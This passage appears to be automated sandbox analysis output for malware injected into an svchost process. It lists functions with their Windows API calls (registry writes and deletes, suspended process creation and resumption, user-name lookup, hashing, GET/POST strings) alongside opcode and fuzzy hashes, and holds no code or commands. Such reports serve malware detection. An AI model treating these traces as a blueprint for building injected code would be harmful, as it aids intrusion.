Instruction Fuzzy Hash: 0B31C371A48219BFE7229E648C49B7BBB9CFF48B85F041C98B946C2140E730D854CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 02535A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02535ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02535AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02535B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02535B2F
HeapFree.KERNEL32(00000000), ref: 02535B36
RegCloseKey.ADVAPI32(?), ref: 02535B3D

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 846906cbd2f12f9f0ce28978cbc97ba92ee9166ad8068a4e3eb4ebf752f00827
Instruction ID: aebf1573468c1d478464691efbc6eb622bba85fed542311ba59651d751e12978
Opcode Fuzzy Hash: 846906cbd2f12f9f0ce28978cbc97ba92ee9166ad8068a4e3eb4ebf752f00827
Instruction Fuzzy Hash: 78214772A443555BC3224EB49C54B37BFA8FF8D911F407819F6828B241EAB0D80997B8

Uniqueness

Uniqueness Score: -1.00%

Function 02532482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 025324B4
lstrlen.KERNEL32(00000000), ref: 025324D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02532524
HeapFree.KERNEL32(00000000), ref: 0253252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0253254C
HeapFree.KERNEL32(00000000), ref: 02532553

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: 9102d4a77f2ba109c54839ae53140e5ce04fa95a7707086d7845ce2d9a7cee62
Instruction ID: ab4986c04b4c1f607ae8d3f90d2e0d9bf9a73d6d8c7d84513b68800e3834b998
Opcode Fuzzy Hash: 9102d4a77f2ba109c54839ae53140e5ce04fa95a7707086d7845ce2d9a7cee62
Instruction Fuzzy Hash: 33213DB2C01609EBDF12DFE0D9087AEBBB9BF48326F106455D900A2180D7744F58DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 025338A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 025338B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 025338D6
RtlAllocateHeap.NTDLL(00000000), ref: 025338DD
_vsnprintf.MSVCRT ref: 025338F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0253390C
HeapFree.KERNEL32(00000000), ref: 02533913

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: 8b0f4c4a7ff45998cb6b791aef9967291b18f92698f06f497e4dabe2dbf71132
Instruction ID: 4225138627920d0b4218ae111d66b77772d3e6e7b121ba1aebbbc43b60764cca
Opcode Fuzzy Hash: 8b0f4c4a7ff45998cb6b791aef9967291b18f92698f06f497e4dabe2dbf71132
Instruction Fuzzy Hash: F801A7B3940209BBD7125EA4CC05F7B77ACFB89760F045865FE15C6240F635D9158BB8

Uniqueness

Uniqueness Score: -1.00%

Function 02534423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(025330CE,00000000,?,025330CE,?), ref: 02534433
GetProcessHeap.KERNEL32(00000008), ref: 02534447
RtlAllocateHeap.NTDLL(00000000), ref: 0253444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02534465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02534471
HeapFree.KERNEL32(00000000), ref: 02534478

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: e4abc9b5f4cd1a49cbf58f95e073b6823aab57b69510d90c35c2e114e4320fad
Instruction ID: e71b2be43e93875ff4b2142ae533177ee2f31ba5b2a423ad7c3547dbaaa705e3
Opcode Fuzzy Hash: e4abc9b5f4cd1a49cbf58f95e073b6823aab57b69510d90c35c2e114e4320fad
Instruction Fuzzy Hash: B9F068B1D45112ABD7220F25AC0CE6BBFACFFC9725F01A928F445C2114D771C419EA64

Uniqueness

Uniqueness Score: -1.00%

Function 025316FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,025317FB,00000001), ref: 02531708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02531722
RtlAllocateHeap.NTDLL(00000000), ref: 02531729
ExpandEnvironmentStringsA.KERNEL32(0253138F,00000000,-00000040), ref: 0253173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02531747
HeapFree.KERNEL32(00000000), ref: 0253174E

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: 99f07296a598b33a37a6b351217b644bbb42fb8b88086e51e077515f14cc1e13
Instruction ID: 6bf5bb871ece5f91251b40cb31d199418e9c58e433189a03058ace81a1f64474
Opcode Fuzzy Hash: 99f07296a598b33a37a6b351217b644bbb42fb8b88086e51e077515f14cc1e13
Instruction Fuzzy Hash: E0F090B2E4061167D7321F75AC0CF5B7FA9BB8D651F096824F94AD6244D730C818A6A8

Uniqueness

Uniqueness Score: -1.00%

Function 02533332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,025360A0), ref: 0253333C
QueryPerformanceCounter.KERNEL32(?), ref: 0253334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02533372
GetTickCount.KERNEL32 ref: 0253337A

Strings

&%c=%u, xrefs: 02533332

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: 1b54f797f9b587b7ed28d3751b9cefce580e6cb7f0d7785d435189165fa08426
Instruction ID: 05bdaf3641fc7f03645883c1b8eca26a45e9396b71b762ba1d697e58bb59167f
Opcode Fuzzy Hash: 1b54f797f9b587b7ed28d3751b9cefce580e6cb7f0d7785d435189165fa08426
Instruction Fuzzy Hash: 0DF01D71E20109BBDF12DFE4D845AADBFB9FB48301F049894F505E2250DB31A614DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0253175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02531784

Part of subcall function 025316FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,025317FB,00000001), ref: 02531708

GetProcessHeap.KERNEL32(00000000,?), ref: 0253180F
HeapFree.KERNEL32(00000000), ref: 02531816

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: 4784c1ada3573810edcd58b50a5e0076b4cca6d61d6d54606ec4248832b02cb1
Instruction ID: e88ba299f9d5a854c0be173fa536842df5a653d5426420b36ae0141c52fa6e2a
Opcode Fuzzy Hash: 4784c1ada3573810edcd58b50a5e0076b4cca6d61d6d54606ec4248832b02cb1
Instruction Fuzzy Hash: 5E31D4729087029FEB179F74D804B7ABBE8BF49250F14A82DF585C6244EB30D405CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 02535348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02535367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,025350BA,00000000), ref: 0253537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,025350BA,00000000), ref: 0253538C
RtlAllocateHeap.NTDLL(00000000), ref: 02535393
lstrcpy.KERNEL32(00000000,?), ref: 025353A3

Part of subcall function 02534543: StrStrIA.SHLWAPI(?,?,?,?,0253712C,025362E4,02537224,?), ref: 02534563

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: d7ffc9f1d03d56ba9f366fa3bc5381e714c88b3256a50304174d27ca6e6372c5
Instruction ID: 4bc29b0ca466baba5489e5db885e737f8bb0beae0fa0a5d76fa950cdc6059aa7
Opcode Fuzzy Hash: d7ffc9f1d03d56ba9f366fa3bc5381e714c88b3256a50304174d27ca6e6372c5
Instruction Fuzzy Hash: C8112EB3D4411E7AAB02EAE4DC05DFEB7ACFB48610B442426F911D6100EB649A198BAD

Uniqueness

Uniqueness Score: -1.00%

Function 02533763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,025336F0,02531134,?), ref: 0253378E
RtlAllocateHeap.NTDLL(00000000,?,025336F0), ref: 02533795
_vsnprintf.MSVCRT ref: 025337AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,025336F0,02531134,?), ref: 025337EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,025336F0,02531134,?), ref: 025337F3

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: 9f853c86e3c3cdf1b92442b668386d25fdd7a8539ca6f4aa7a35b8dc2f993e71
Instruction ID: 4730bb92ca6ff6f59381f0b6c945368ec9790c85183c8c60872c3257a1401fe3
Opcode Fuzzy Hash: 9f853c86e3c3cdf1b92442b668386d25fdd7a8539ca6f4aa7a35b8dc2f993e71
Instruction Fuzzy Hash: EB01E5B29441077BD7021AA4EC05F677BAAFF89264F406864FA0486214EA3589259BB9

Uniqueness

Uniqueness Score: -1.00%

Function 02534F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02534F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02534F84
CloseHandle.KERNEL32(00000000), ref: 02534F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02534FB5
HeapFree.KERNEL32(00000000), ref: 02534FBC

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: 92a2ddf5c4ac6cdcd4c3826d845cf09641f053bea8f25e2c8c7f3cabb19e706a
Instruction ID: 35ce65c447c68125063a693c7ba232479223dc94852e304ef88ded76c278cc8f
Opcode Fuzzy Hash: 92a2ddf5c4ac6cdcd4c3826d845cf09641f053bea8f25e2c8c7f3cabb19e706a
Instruction Fuzzy Hash: EAF02432C45129BBCB225FA0DC08A9EBF68FF09325F005200F904D6240C7308A109BE9

Uniqueness

Uniqueness Score: -1.00%

Function 025321C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02532225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 0253225A
RtlAllocateHeap.NTDLL(00000000), ref: 02532261

Strings

f<v, xrefs: 025323B0

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: ffc16106130406b81603366d5527f443f305f6c3aa5f903261ea081361ebab53
Instruction ID: 0110514a1768ee918b7f8345f7c5aa2d789d9615224ad66c0d4c2f4ec83cb17d
Opcode Fuzzy Hash: ffc16106130406b81603366d5527f443f305f6c3aa5f903261ea081361ebab53
Instruction Fuzzy Hash: 6A81B4B2908652ABD322DF64DC40A67BBECBF85300F05686DFC95D3250E734D914C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0253315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 025332A2
RtlAllocateHeap.NTDLL(00000000), ref: 025332AF

Strings

POST, xrefs: 025331B9
GET, xrefs: 025331D0, 025331DC

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: 418b0ca021a588c6342186a97d69b932b21978edb0fd575818416e556fd45727
Instruction ID: 7c7e336dce445fd54b2525c6b7f09e61d91abc1d35e9add1305734cfdac4d94b
Opcode Fuzzy Hash: 418b0ca021a588c6342186a97d69b932b21978edb0fd575818416e556fd45727
Instruction Fuzzy Hash: 28516DB1A44746AFE7218F25CC84F67BBECFB89604F045D5DB992C2240DB34D818DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02534EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02534EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02534F35

Part of subcall function 025349EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000), ref: 02534A7A
Part of subcall function 025349EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000,?,?,?), ref: 02534A81
Part of subcall function 025349EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000), ref: 02534A92
Part of subcall function 025349EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000,?,?,?), ref: 02534A99

ResumeThread.KERNEL32(025349A2,?,?,?), ref: 02534F51
CloseHandle.KERNEL32(025349A2,?,?,?), ref: 02534F5A

Strings

D, xrefs: 02534F02

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: 39da1eb4dd9a7da982884c19f98ea1cf53428f1125dfcb8eba34785f19fc7b38
Instruction ID: d94109ed6f14957424a7f59ba9bc2ba3c489c468af8ab7df0c11a9adef89b553
Opcode Fuzzy Hash: 39da1eb4dd9a7da982884c19f98ea1cf53428f1125dfcb8eba34785f19fc7b38
Instruction Fuzzy Hash: 190108B2D0020DBFEB41AAE8DC85DFFB7BDFB48314F001825F605E6150E6759E189A69

Uniqueness

Uniqueness Score: -1.00%

Function 025327E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 025327F9
CreateProcessW.KERNEL32(00000000,025362F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02532825
ExitProcess.KERNEL32 ref: 0253282C

Strings

D, xrefs: 02532800

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: efb7d8e6fa33cf89c882742175ddcea9de477ecb50f6bdd6b6705e5c1eacf9ef
Instruction ID: 9f34ed4e1ff9569221e8439de0840b3e5ff9c411d73420c1ebac5f9bae62f096
Opcode Fuzzy Hash: efb7d8e6fa33cf89c882742175ddcea9de477ecb50f6bdd6b6705e5c1eacf9ef
Instruction Fuzzy Hash: 43E0EDF184064D7EE740DAF8CD85EAFB7BCBB48704F001825B706E6150E6789E1C8A6A

Uniqueness

Uniqueness Score: -1.00%

Function 02535208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0253525E
Sleep.KERNEL32(00001388), ref: 02535271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0253528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02535327
GetProcessHeap.KERNEL32(00000000,?), ref: 02535333

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: bf0405a389acd6466840e83435450a00c2ec32be2b9d199fcb1577c0b6ccb3b0
Instruction ID: da6bee9d4b70bffe97e285cae1d29937b1cc9da5ddfb92c90b6a34cb74cc1b85
Opcode Fuzzy Hash: bf0405a389acd6466840e83435450a00c2ec32be2b9d199fcb1577c0b6ccb3b0
Instruction Fuzzy Hash: 4941D2729043009BC722DFA4C848B6BBBE8FF8C319F842E1DF59592180E770D508CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 02535B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02535B64

Part of subcall function 02532F1A: CryptAcquireContextW.ADVAPI32(02537658,00000000,00000000,00000001,F0000000,025362B0,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F35
Part of subcall function 02532F1A: CryptCreateHash.ADVAPI32(02537658,00008003,00000000,00000000,?,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F52
Part of subcall function 02532F1A: CryptHashData.ADVAPI32(?,02537658,?,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F68
Part of subcall function 02532F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F83
Part of subcall function 02532F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02535B88,?,00000000,?), ref: 02532FA3
Part of subcall function 02532F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532FB3
Part of subcall function 02532F1A: CryptReleaseContext.ADVAPI32(02537658,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532FC2

Part of subcall function 025344D2: wsprintfA.USER32 ref: 02534509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02535BF4

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: 6399d1d4267610793d99a4f3449a99d91226caa38e5d18bcb26acaa385c52d53
Instruction ID: 705a425b779811c7d44a34034b1707559004ba729f7456f79f5db82bc4df8a13
Opcode Fuzzy Hash: 6399d1d4267610793d99a4f3449a99d91226caa38e5d18bcb26acaa385c52d53
Instruction Fuzzy Hash: 7E21D0B28442499EDB128FA4CC94AEEBFACFB0D310F543955F906D6202E7309144CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 02533803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02533904,?,00000000,00000000,00000000,00000007,?,?), ref: 02533855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02533904), ref: 0253385C

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 0c2e49e98d55788fa8ffc894cdb70042f74b14259007d6f24f27125db59dbabd
Instruction ID: ad13c25753e21fa3e0cf980a142feed9f98038b744a193d7c3df92f342eb3065
Opcode Fuzzy Hash: 0c2e49e98d55788fa8ffc894cdb70042f74b14259007d6f24f27125db59dbabd
Instruction Fuzzy Hash: CD11AC72E01341AFC7328E69D844B66FBE9BF89625F1858ADE5D2C7304D730E446CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0253540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0253542D
RtlAllocateHeap.NTDLL(00000000), ref: 02535434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02535496
HeapFree.KERNEL32(00000000), ref: 0253549D

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: b59f4c2c443975d448c51a5a69dd276ed63d215fdbae6196baba3ebfac64f649
Instruction ID: 0547a72e284ee8b287bd1949f84fc129b1c7cd7271f41e9d59787a2403a41d23
Opcode Fuzzy Hash: b59f4c2c443975d448c51a5a69dd276ed63d215fdbae6196baba3ebfac64f649
Instruction Fuzzy Hash: 43115C77D002056BCB129EB8CC48FA7BBADBB8C621F406965FE49D7204FA30D80487B4

Uniqueness

Uniqueness Score: -1.00%

Function 02534AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000), ref: 02534AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02534ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02534B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02534B11

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 193800408d2794e8c8055b448d3d71f80a66ffa3ee98880c5439900c650bf00c
Instruction ID: 4efbbf4b4f751317833647965cae05362769037c01c58ee1a4909942681ddfd4
Opcode Fuzzy Hash: 193800408d2794e8c8055b448d3d71f80a66ffa3ee98880c5439900c650bf00c
Instruction Fuzzy Hash: 4B1173B5A40702ABE7A29F74DC05B12BBE5BF08344F089929F686C6594EB31D814DF58

Uniqueness

Uniqueness Score: -1.00%

Function 02531496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 025314DF
HeapFree.KERNEL32(00000000), ref: 025314E6

Strings

!, xrefs: 025314C6
!, xrefs: 025314A3

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: f4ab83d56dc2c53c0701ed5001e0796e8e9a1ab9e27a54f8155f5b04b34ada9e
Instruction ID: 23263a19c572ec634c331cc7f42073db274665608cfe22fca46416e540142b62
Opcode Fuzzy Hash: f4ab83d56dc2c53c0701ed5001e0796e8e9a1ab9e27a54f8155f5b04b34ada9e
Instruction Fuzzy Hash: 9DF09072A842146EFB125AB4DC09BF67F9DFB08760F48D411FD09C9280EA71D99096E8

Uniqueness

Uniqueness Score: -1.00%

Function 025325E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02537328), ref: 025325F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02532612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02532623
GetLastError.KERNEL32 ref: 0253262D

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: da8954b420ffe59a13724cfed628006cc477e16d8f6973b3cc4db860dbee72ae
Instruction ID: 189bf9532df919b28bece78b854da652004bd37af4f92bf737d5ef07c5ca7e81
Opcode Fuzzy Hash: da8954b420ffe59a13724cfed628006cc477e16d8f6973b3cc4db860dbee72ae
Instruction Fuzzy Hash: FFF06271944249AAE7215AA29C4DE7FBBBCEFC9B00F00101EF805C2140EA2498189A39

Uniqueness

Uniqueness Score: -1.00%

Function 025349EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000), ref: 02534A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000,?,?,?), ref: 02534A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000), ref: 02534A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02534F4C,?,00000000,?,?,?), ref: 02534A99

Part of subcall function 02534B3F: lstrcpy.KERNEL32(-00000469,?), ref: 02534C69

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: 42876c9a104d84ddf5801f866821bec77ea774f927d9372bef6f33cb1d01949a
Instruction ID: ce2862ddc697ace221c450775620e34c96a4ce15b34df0c164dcefa88d043be4
Opcode Fuzzy Hash: 42876c9a104d84ddf5801f866821bec77ea774f927d9372bef6f33cb1d01949a
Instruction Fuzzy Hash: 4A214A768083169FC311DFA4D84494BBBE9FB88254F04591EF589D7200DB34DA449F8A

Uniqueness

Uniqueness Score: -1.00%

Function 0253136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 025313EC
HeapFree.KERNEL32(00000000), ref: 025313F3

Memory Dump Source

